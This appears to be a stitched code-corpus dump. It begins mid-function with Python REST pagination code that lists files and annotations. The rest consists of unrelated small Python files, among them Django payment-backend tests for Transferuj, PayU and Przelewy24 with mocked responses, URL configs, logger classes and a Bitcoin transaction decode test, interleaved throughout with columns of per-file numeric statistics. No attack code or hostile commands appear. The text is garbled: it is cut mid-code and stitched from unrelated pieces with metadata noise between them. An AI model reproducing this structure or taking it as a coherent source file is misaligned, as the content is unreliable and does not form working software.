url_next = (base_url+'/files?from={0}&size={1}'.format(from_next, size))
rval = rest.Utils.GetURL(url_next, parse_json=True)
files = rval["data"]["hits"] if "data" in rval and "hits" in rval["data"] else []
for file_this in files:
logging.debug(json.dumps(file_this, indent=2))
if not tags:
tags = list(file_this.keys())
fout.write("\t".join(tags)+"\n")
vals = [(str(file_this[tag]) if tag in file_this else "") for tag in tags]
fout.write("\t".join(vals)+"\n")
n_out+=1
if n_out>=nmax: break
if n_out>=nmax: break
total = rval["data"]["pagination"]["total"] if "data" in rval and "pagination" in rval["data"] and "total" in rval["data"]["pagination"] else None
count = rval["data"]["pagination"]["count"] if "data" in rval and "pagination" in rval["data"] and "count" in rval["data"]["pagination"] else None
if not count or count<size: break
from_next += count
logging.info("n_out: %d / %d"%(n_out, total))
##############################################################################
def ListAnnotations(base_url, skip, nmax, fout):
n_out=0; tags=None;
from_next=skip; size=100;
while True:
url_next = (base_url+'/annotations?from={0}&size={1}'.format(from_next, size))
rval = rest.Utils.GetURL(url_next, parse_json=True)
annos = rval["data"]["hits"] if "data" in rval and "hits" in rval["data"] else []
for anno in annos:
logging.debug(json.dumps(anno, indent=2))
if not tags:
tags = list(anno.keys())
fout.write("\t".join(tags)+"\n")
vals = [(str(anno[tag]) if tag in anno else "") for tag in tags]
fout.write("\t".join(vals)+"\n")
n_out+=1
if n_out>=nmax: break
if n_out>=nmax: break
total = rval["data"]["pagination"]["total"] if "data" in rval and "pagination" in rval["data"] and "total" in rval["data"]["pagination"] else None
count = rval["data"]["pagination"]["count"] if "data" in rval and "pagination" in rval["data"] and "count" in rval["data"]["pagination"] else None
if not count or count<size: break
from_next += count
logging.info("n_out: %d / %d"%(n_out, total))
##############################################################################
| 46.349057
| 150
| 0.577244
| 722
| 4,913
| 3.84349
| 0.112188
| 0.092252
| 0.072072
| 0.051892
| 0.833514
| 0.833514
| 0.833514
| 0.798919
| 0.798919
| 0.755676
| 0
| 0.008156
| 0.176471
| 4,913
| 105
| 151
| 46.790476
| 0.677706
| 0.011805
| 0
| 0.666667
| 0
| 0
| 0.161804
| 0.023564
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044444
| false
| 0
| 0.022222
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c892cdc6da614381c22abda1ab43908dc48a4004
| 93
|
py
|
Python
|
tests/models.py
|
PetrDlouhy/dj-fiobank-payments
|
8047b39ecf2b690d143e2dd35d008c56aea44b27
|
[
"MIT"
] | null | null | null |
tests/models.py
|
PetrDlouhy/dj-fiobank-payments
|
8047b39ecf2b690d143e2dd35d008c56aea44b27
|
[
"MIT"
] | null | null | null |
tests/models.py
|
PetrDlouhy/dj-fiobank-payments
|
8047b39ecf2b690d143e2dd35d008c56aea44b27
|
[
"MIT"
] | null | null | null |
from dj_fiobank_payments.models import AbstractOrder
class Order(AbstractOrder):
pass
| 13.285714
| 52
| 0.806452
| 11
| 93
| 6.636364
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150538
| 93
| 6
| 53
| 15.5
| 0.924051
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
c8f487c15a8a4a365392b1aac0f7aa9de8f0a86d
| 70
|
py
|
Python
|
jsonfield/tests/__init__.py
|
peopledoc/django-jsonfield
|
031ef0f9460da5ad76edf5167e1847082c66be56
|
[
"BSD-3-Clause"
] | 31
|
2019-05-13T21:22:56.000Z
|
2021-07-14T02:57:19.000Z
|
jsonfield/tests/__init__.py
|
peopledoc/django-jsonfield
|
031ef0f9460da5ad76edf5167e1847082c66be56
|
[
"BSD-3-Clause"
] | 20
|
2019-03-16T11:11:19.000Z
|
2021-06-16T21:53:47.000Z
|
jsonfield/tests/__init__.py
|
peopledoc/django-jsonfield
|
031ef0f9460da5ad76edf5167e1847082c66be56
|
[
"BSD-3-Clause"
] | 25
|
2019-03-18T18:41:27.000Z
|
2022-03-16T10:28:09.000Z
|
from .test_fields import * # NOQA
from .test_forms import * # NOQA
| 23.333333
| 34
| 0.7
| 10
| 70
| 4.7
| 0.6
| 0.340426
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.214286
| 70
| 2
| 35
| 35
| 0.854545
| 0.128571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
cdacb2d59f44e3a96a3e4fd53f1469c7cd235866
| 142
|
py
|
Python
|
hooks/__init__.py
|
leigingban/webtools
|
f8f20ee7837a924c7cb4bef9db7f6981fa892abd
|
[
"Apache-2.0"
] | null | null | null |
hooks/__init__.py
|
leigingban/webtools
|
f8f20ee7837a924c7cb4bef9db7f6981fa892abd
|
[
"Apache-2.0"
] | null | null | null |
hooks/__init__.py
|
leigingban/webtools
|
f8f20ee7837a924c7cb4bef9db7f6981fa892abd
|
[
"Apache-2.0"
] | null | null | null |
from .base import BaseHook
from .cookies import CookieSavingHook
from .debug import ShowDebugMsgHook
from .base import MY_PATH, MY_FILE_NAME
| 23.666667
| 39
| 0.838028
| 20
| 142
| 5.8
| 0.6
| 0.137931
| 0.241379
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126761
| 142
| 5
| 40
| 28.4
| 0.935484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a814a249447cb0b79e4dbab52ffedda4511226e1
| 98
|
py
|
Python
|
test.py
|
robmarkcole/google-map-downloader
|
c4bd02f3ec75b2bd61845d93c90a849e8367da73
|
[
"MIT"
] | 4
|
2021-11-09T13:36:21.000Z
|
2022-02-17T16:18:59.000Z
|
test.py
|
robmarkcole/google-map-downloader
|
c4bd02f3ec75b2bd61845d93c90a849e8367da73
|
[
"MIT"
] | null | null | null |
test.py
|
robmarkcole/google-map-downloader
|
c4bd02f3ec75b2bd61845d93c90a849e8367da73
|
[
"MIT"
] | null | null | null |
from downloader import *
main(100.361, 38.866, 100.386, 38.839, 13, 'test1.tif', server="Google")
| 32.666667
| 72
| 0.693878
| 17
| 98
| 4
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.287356
| 0.112245
| 98
| 3
| 72
| 32.666667
| 0.494253
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
b534363d4c2e77fdcaffa888ca92a67ef6705f6a
| 221
|
py
|
Python
|
sample/libs/users/infrastructure/in_memory_user_logger.py
|
ticdenis/python-aiodi
|
4ad35145674f5ec0ed6324bec7dd186ab0a8bc33
|
[
"MIT"
] | 1
|
2021-11-10T00:21:34.000Z
|
2021-11-10T00:21:34.000Z
|
sample/libs/users/infrastructure/in_memory_user_logger.py
|
ticdenis/python-aiodi
|
4ad35145674f5ec0ed6324bec7dd186ab0a8bc33
|
[
"MIT"
] | 1
|
2022-01-29T15:40:26.000Z
|
2022-02-20T20:08:55.000Z
|
sample/libs/users/infrastructure/in_memory_user_logger.py
|
ticdenis/python-aiodi
|
4ad35145674f5ec0ed6324bec7dd186ab0a8bc33
|
[
"MIT"
] | null | null | null |
from logging import Logger
class InMemoryUserLogger:
__slots__ = '_logger'
def __init__(self, logger: Logger) -> None:
self._logger = logger
def logger(self) -> Logger:
return self._logger
| 18.416667
| 47
| 0.660633
| 24
| 221
| 5.625
| 0.5
| 0.296296
| 0.237037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.253394
| 221
| 11
| 48
| 20.090909
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0.031674
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0.142857
| 0.142857
| 0.857143
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
b5608e38697163bd594ceef357ea247aa10248ff
| 29
|
py
|
Python
|
print03.py
|
Mr-Umidjon/print_homework
|
b5f42bc12573663632d6c9e669a2ce5d85fe612e
|
[
"MIT"
] | null | null | null |
print03.py
|
Mr-Umidjon/print_homework
|
b5f42bc12573663632d6c9e669a2ce5d85fe612e
|
[
"MIT"
] | null | null | null |
print03.py
|
Mr-Umidjon/print_homework
|
b5f42bc12573663632d6c9e669a2ce5d85fe612e
|
[
"MIT"
] | null | null | null |
print('( _ )')
print(' ) (')
| 9.666667
| 14
| 0.37931
| 2
| 29
| 5
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.206897
| 29
| 2
| 15
| 14.5
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0.310345
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
8d28f3c5cd2b38ca6f806597934563935be01cae
| 813
|
py
|
Python
|
tests/network/test_decode.py
|
richardkiss/bit
|
1836cee261edda46ad93da6253d62b2d0fc2ae39
|
[
"MIT"
] | null | null | null |
tests/network/test_decode.py
|
richardkiss/bit
|
1836cee261edda46ad93da6253d62b2d0fc2ae39
|
[
"MIT"
] | null | null | null |
tests/network/test_decode.py
|
richardkiss/bit
|
1836cee261edda46ad93da6253d62b2d0fc2ae39
|
[
"MIT"
] | 1
|
2022-02-26T16:31:11.000Z
|
2022-02-26T16:31:11.000Z
|
from bit.network import get_decoded_tx
TESTNET_TX = ('01000000018878399d83ec25c627cfbf753ff9ca3602373eac437ab2676154a3c2'
'da23adf3010000008a473044022068b8dce776ef1c071f4c516836cdfb358e44ef'
'58e0bf29d6776ebdc4a6b719df02204ea4a9b0f4e6afa4c229a3f11108ff66b178'
'95015afa0c26c4bbc2b3ba1a1cc60141043d5c2875c9bd116875a71a5db64cffcb'
'13396b163d039b1d932782489180433476a4352a2add00ebb0d5c94c515b72eb10'
'f1fd8f3f03b42f4a2b255bfc9aa9e3ffffffff0250c30000000000001976a914e7'
'c1345fc8f87c68170b3aa798a956c2fe6a9eff88ac0888fc04000000001976a914'
'92461bde6283b461ece7ddf4dbf1e0a48bd113d888ac00000000')
def test_get_decoded_tx():
tx = get_decoded_tx(TESTNET_TX, test=True)
assert len(tx['data']['tx']['vout']) == 2
| 50.8125
| 82
| 0.782288
| 37
| 813
| 16.945946
| 0.648649
| 0.047847
| 0.057416
| 0.060606
| 0.066986
| 0
| 0
| 0
| 0
| 0
| 0
| 0.491176
| 0.163592
| 813
| 15
| 83
| 54.2
| 0.430882
| 0
| 0
| 0
| 0
| 0
| 0.644526
| 0.632226
| 0
| 1
| 0
| 0
| 0.083333
| 1
| 0.083333
| false
| 0
| 0.083333
| 0
| 0.166667
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8d2a355a0a722738734e20a2667887754fe58590
| 18,355
|
py
|
Python
|
getpaid/tests.py
|
fizista/django-getpaid
|
e3f1e957c0be720a5c13d2f4f6f163050bab723d
|
[
"MIT"
] | null | null | null |
getpaid/tests.py
|
fizista/django-getpaid
|
e3f1e957c0be720a5c13d2f4f6f163050bab723d
|
[
"MIT"
] | null | null | null |
getpaid/tests.py
|
fizista/django-getpaid
|
e3f1e957c0be720a5c13d2f4f6f163050bab723d
|
[
"MIT"
] | null | null | null |
"""
This file demonstrates writing tests using the unittest module. These will pass
when you run "manage.py test".
Replace this with more appropriate tests for your application.
"""
from decimal import Decimal
from django.core.urlresolvers import reverse
from django.db.models.loading import get_model
from django.test import TestCase
from django.test.client import Client
import mock
from getpaid.backends import przelewy24
import getpaid.backends.payu
import getpaid.backends.transferuj
from getpaid_test_project.orders.models import Order
class TransferujBackendTestCase(TestCase):
def test_online_not_allowed_ip(self):
self.assertEqual('IP ERR',
getpaid.backends.transferuj.PaymentProcessor.online('0.0.0.0', None, None, None, None, None,
None, None, None, None, None, None))
#Tests allowing IP given in settings
with self.settings(GETPAID_BACKENDS_SETTINGS={
'getpaid.backends.transferuj': {'allowed_ip': ('1.1.1.1', '1.2.3.4'), 'key': ''},
}):
self.assertEqual('IP ERR',
getpaid.backends.transferuj.PaymentProcessor.online('0.0.0.0', None, None, None, None,
None, None, None, None, None, None,
None))
self.assertNotEqual('IP ERR',
getpaid.backends.transferuj.PaymentProcessor.online('1.1.1.1', None, None, None, None,
None, None, None, None, None, None,
None))
self.assertNotEqual('IP ERR',
getpaid.backends.transferuj.PaymentProcessor.online('1.2.3.4', None, None, None, None,
None, None, None, None, None, None,
None))
#Tests allowing all IP
with self.settings(GETPAID_BACKENDS_SETTINGS={
'getpaid.backends.transferuj': {'allowed_ip': [], 'key': ''},
}):
self.assertNotEqual('IP ERR',
getpaid.backends.transferuj.PaymentProcessor.online('0.0.0.0', None, None, None, None,
None, None, None, None, None, None,
None))
self.assertNotEqual('IP ERR',
getpaid.backends.transferuj.PaymentProcessor.online('1.1.1.1', None, None, None, None,
None, None, None, None, None, None,
None))
self.assertNotEqual('IP ERR',
getpaid.backends.transferuj.PaymentProcessor.online('1.2.3.4', None, None, None, None,
None, None, None, None, None, None,
None))
def test_online_wrong_sig(self):
self.assertEqual('SIG ERR',
getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '', '1',
'123.45', None, None, None, None, None,
'xxx'))
self.assertNotEqual('SIG ERR',
getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '', '1',
'123.45', None, None, None, None, None,
'21b028c2dbdcb9ca272d1cc67ed0574e'))
def test_online_wrong_id(self):
self.assertEqual('ID ERR',
getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1111', '1', '', '1',
'123.45', None, None, None, None, None,
'15bb75707d4374bc6e578c0cbf5a7fc7'))
self.assertNotEqual('ID ERR',
getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '', '1',
'123.45', None, None, None, None, None,
'f5f8276fbaa98a6e05b1056ab7c3a589'))
def test_online_crc_error(self):
self.assertEqual('CRC ERR',
getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '',
'99999', '123.45', None, None, None, None,
None, 'f5f8276fbaa98a6e05b1056ab7c3a589'))
self.assertEqual('CRC ERR',
getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '',
'GRRGRRG', '123.45', None, None, None,
None, None,
'6a9e045010c27dfed24774b0afa37d0b'))
def test_online_payment_ok(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test EUR order', total='123.45', currency='PLN')
order.save()
payment = Payment(order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
self.assertEqual('TRUE', getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '',
payment.pk, '123.45', '123.45', '',
'TRUE', 0, '',
'21b028c2dbdcb9ca272d1cc67ed0574e'))
payment = Payment.objects.get(pk=payment.pk)
self.assertEqual(payment.status, 'paid')
self.assertNotEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('123.45'))
def test_online_payment_ok_over(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test EUR order', total='123.45', currency='PLN')
order.save()
payment = Payment(order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
self.assertEqual('TRUE', getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '',
payment.pk, '123.45', '223.45', '',
'TRUE', 0, '',
'21b028c2dbdcb9ca272d1cc67ed0574e'))
payment = Payment.objects.get(pk=payment.pk)
self.assertEqual(payment.status, 'paid')
self.assertNotEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('223.45'))
def test_online_payment_partial(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test EUR order', total='123.45', currency='PLN')
order.save()
payment = Payment(order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
self.assertEqual('TRUE', getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '',
payment.pk, '123.45', '23.45', '',
'TRUE', 0, '',
'21b028c2dbdcb9ca272d1cc67ed0574e'))
payment = Payment.objects.get(pk=payment.pk)
self.assertEqual(payment.status, 'partially_paid')
self.assertNotEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('23.45'))
def test_online_payment_failure(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test EUR order', total='123.45', currency='PLN')
order.save()
payment = Payment(order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
self.assertEqual('TRUE', getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '',
payment.pk, '123.45', '23.45', '',
False, 0, '',
'21b028c2dbdcb9ca272d1cc67ed0574e'))
payment = Payment.objects.get(pk=payment.pk)
self.assertEqual(payment.status, 'failed')
def fake_payment_get_response_success(request):
class fake_response:
def read(self):
return """<?xml version="1.0" encoding="UTF-8"?>
<response>
<status>OK</status>
<trans>
<id>234748067</id>
<pos_id>123456789</pos_id>
<session_id>99:1342616247.41</session_id>
<order_id>99</order_id>
<amount>12345</amount>
<status>99</status>
<pay_type>t</pay_type>
<pay_gw_name>pt</pay_gw_name>
<desc>Test 2</desc>
<desc2></desc2>
<create>2012-07-18 14:57:28</create>
<init></init>
<sent></sent>
<recv></recv>
<cancel>2012-07-18 14:57:30</cancel>
<auth_fraud>0</auth_fraud>
<ts>1342616255805</ts>
<sig>4d4df5557b89a4e2d8c48436b1dd3fef</sig> </trans>
</response>"""
return fake_response()
def fake_payment_get_response_failure(request):
class fake_response:
def read(self):
return """<?xml version="1.0" encoding="UTF-8"?>
<response>
<status>OK</status>
<trans>
<id>234748067</id>
<pos_id>123456789</pos_id>
<session_id>98:1342616247.41</session_id>
<order_id>98</order_id>
<amount>12345</amount>
<status>2</status>
<pay_type>t</pay_type>
<pay_gw_name>pt</pay_gw_name>
<desc>Test 2</desc>
<desc2></desc2>
<create>2012-07-18 14:57:28</create>
<init></init>
<sent></sent>
<recv></recv>
<cancel>2012-07-18 14:57:30</cancel>
<auth_fraud>0</auth_fraud>
<ts>1342616255805</ts>
<sig>ee77e9515599e3fd2b3721dff50111dd</sig> </trans>
</response>"""
return fake_response()
class PayUBackendTestCase(TestCase):
def setUp(self):
self.client = Client()
def test_online_malformed(self):
response = self.client.post(reverse('getpaid-payu-online'), {})
self.assertEqual(response.content, 'MALFORMED')
def test_online_sig_err(self):
response = self.client.post(reverse('getpaid-payu-online'), {
'pos_id' : 'wrong',
'session_id': '10:11111',
'ts' : '1111',
'sig' : 'wrong sig',
})
self.assertEqual(response.content, 'SIG ERR')
def test_online_wrong_pos_id_err(self):
response = self.client.post(reverse('getpaid-payu-online'), {
'pos_id' : '12345',
'session_id': '10:11111',
'ts' : '1111',
'sig' : '0d6129738c0aee9d4eb56f2a1db75ab4',
})
self.assertEqual(response.content, 'POS_ID ERR')
def test_online_wrong_session_id_err(self):
response = self.client.post(reverse('getpaid-payu-online'), {
'pos_id' : '123456789',
'session_id': '111111',
'ts' : '1111',
'sig' : 'fcf3db081d5085b45fe86ed0c6a9aa5e',
})
self.assertEqual(response.content, 'SESSION_ID ERR')
def test_online_ok(self):
response = self.client.post(reverse('getpaid-payu-online'), {
'pos_id' : '123456789',
'session_id': '1:11111',
'ts' : '1111',
'sig' : '2a78322c06522613cbd7447983570188',
})
self.assertEqual(response.content, 'OK')
@mock.patch("urllib2.urlopen", fake_payment_get_response_success)
def test_payment_get_paid(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test EUR order', total='123.45', currency='PLN')
order.save()
payment = Payment(pk=99, order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
payment = Payment.objects.get(pk=99) # this line is because django bug https://code.djangoproject.com/ticket/5903
processor = getpaid.backends.payu.PaymentProcessor(payment)
processor.get_payment_status('99:1342616247.41')
self.assertEqual(payment.status, 'paid')
self.assertNotEqual(payment.paid_on, None)
self.assertNotEqual(payment.amount_paid, Decimal('0'))
@mock.patch("urllib2.urlopen", fake_payment_get_response_failure)
def test_payment_get_failed(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test EUR order', total='123.45', currency='PLN')
order.save()
payment = Payment(pk=98, order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
payment = Payment.objects.get(pk=98) # this line is because django bug https://code.djangoproject.com/ticket/5903
processor = getpaid.backends.payu.PaymentProcessor(payment)
processor.get_payment_status('98:1342616247.41')
self.assertEqual(payment.status, 'failed')
self.assertEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('0'))
def fake_przelewy24_payment_get_response_success(request):
class fake_response:
def read(self):
return """RESULT
TRUE"""
return fake_response()
def fake_przelewy24_payment_get_response_failed(request):
class fake_response:
def read(self):
return """RESULT
ERR
123
Some error description"""
return fake_response()
class Przelewy24PaymentProcessorTestCase(TestCase):
def test_sig(self):
# Test based on p24 documentation
sig = przelewy24.PaymentProcessor.compute_sig({
'key1' : '9999',
'key2' : '2500',
'key3' : 'ccc',
'key4' : 'abcdefghijk',
'crc' : 'a123b456c789d012',
}, ('key4', 'key1', 'key2', 'crc'), 'a123b456c789d012')
self.assertEqual(sig, 'e2c43dec9578633c518e1f514d3b434b')
@mock.patch("urllib2.urlopen", fake_przelewy24_payment_get_response_success)
def test_get_payment_status_success(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test PLN order', total='123.45', currency='PLN')
order.save()
payment = Payment(pk=191, order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.przelewy24')
payment.save(force_insert=True)
payment = Payment.objects.get(pk=191)
processor = getpaid.backends.przelewy24.PaymentProcessor(payment)
processor.get_payment_status(p24_session_id='191:xxx:xxx', p24_order_id='191:external', p24_kwota='12345')
self.assertEqual(payment.status, 'paid')
self.assertEqual(payment.external_id, '191:external')
self.assertNotEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('123.45'))
@mock.patch("urllib2.urlopen", fake_przelewy24_payment_get_response_success)
def test_get_payment_status_success_partial(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test PLN order', total='123.45', currency='PLN')
order.save()
payment = Payment(pk=192, order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.przelewy24')
payment.save(force_insert=True)
payment = Payment.objects.get(pk=192)
processor = getpaid.backends.przelewy24.PaymentProcessor(payment)
processor.get_payment_status(p24_session_id='192:xxx:xxx', p24_order_id='192:external', p24_kwota='12245')
self.assertEqual(payment.status, 'partially_paid')
self.assertEqual(payment.external_id, '192:external')
self.assertNotEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('122.45'))
@mock.patch("urllib2.urlopen", fake_przelewy24_payment_get_response_failed)
def test_get_payment_status_failed(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test PLN order', total='123.45', currency='PLN')
order.save()
payment = Payment(pk=192, order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.przelewy24')
payment.save(force_insert=True)
payment = Payment.objects.get(pk=192)
processor = getpaid.backends.przelewy24.PaymentProcessor(payment)
processor.get_payment_status(p24_session_id='192:xxx:xxx', p24_order_id='192:external', p24_kwota='12245')
self.assertEqual(payment.status, 'failed')
self.assertEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('0.0'))
| 49.07754
| 130
| 0.542359
| 1,805
| 18,355
| 5.39169
| 0.118006
| 0.077271
| 0.099877
| 0.111796
| 0.820078
| 0.790896
| 0.752055
| 0.741677
| 0.723284
| 0.708076
| 0
| 0.088697
| 0.337238
| 18,355
| 373
| 131
| 49.209115
| 0.711303
| 0.022501
| 0
| 0.63871
| 0
| 0
| 0.196944
| 0.066094
| 0
| 0
| 0
| 0
| 0.16129
| 1
| 0.090323
| false
| 0
| 0.032258
| 0.012903
| 0.170968
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8d90da96d9ad8a53fa62e6dc5cd7e352f1cb70e5
| 467
|
py
|
Python
|
e/mail-relay/web/apps/localized_mail/urls.py
|
zhouli121018/nodejsgm
|
0ccbc8acf61badc812f684dd39253d55c99f08eb
|
[
"MIT"
] | null | null | null |
e/mail-relay/web/apps/localized_mail/urls.py
|
zhouli121018/nodejsgm
|
0ccbc8acf61badc812f684dd39253d55c99f08eb
|
[
"MIT"
] | 18
|
2020-06-05T18:17:40.000Z
|
2022-03-11T23:25:21.000Z
|
e/mail-relay/web/apps/localized_mail/urls.py
|
zhouli121018/nodejsgm
|
0ccbc8acf61badc812f684dd39253d55c99f08eb
|
[
"MIT"
] | null | null | null |
from django.conf.urls import patterns, url
urlpatterns = patterns('',
url(r'mail_list$', 'apps.localized_mail.views.mail_list', name='localized_mail_list'),
#
url(r'mail_read$', 'apps.localized_mail.views.mail_read', name='localized_mail_read'),
url(r'ajax_get_mails$', 'apps.localized_mail.views.ajax_get_mails', name='ajax_get_localized_mails'),
url(r'mail_summary$', 'apps.localized_mail.views.mail_summary', name='localized_mail_summary'),
)
| 46.7
| 105
| 0.749465
| 68
| 467
| 4.808824
| 0.294118
| 0.278287
| 0.207951
| 0.269113
| 0.238532
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092077
| 467
| 9
| 106
| 51.888889
| 0.771226
| 0
| 0
| 0
| 0
| 0
| 0.600858
| 0.416309
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a5e0dd02e6c5e1d3a61c9296a5ce1695e174c4a2
| 21
|
py
|
Python
|
datasets/__init__.py
|
vayzenb/open_ipcl
|
c350f5114fb529a111ccd12eb10b8162bd1101c9
|
[
"MIT"
] | 7
|
2021-11-14T15:32:59.000Z
|
2022-02-15T15:34:44.000Z
|
datasets/__init__.py
|
vayzenb/open_ipcl
|
c350f5114fb529a111ccd12eb10b8162bd1101c9
|
[
"MIT"
] | null | null | null |
datasets/__init__.py
|
vayzenb/open_ipcl
|
c350f5114fb529a111ccd12eb10b8162bd1101c9
|
[
"MIT"
] | 2
|
2021-11-14T15:38:44.000Z
|
2022-01-30T11:55:46.000Z
|
from .folder import *
| 21
| 21
| 0.761905
| 3
| 21
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 21
| 1
| 21
| 21
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
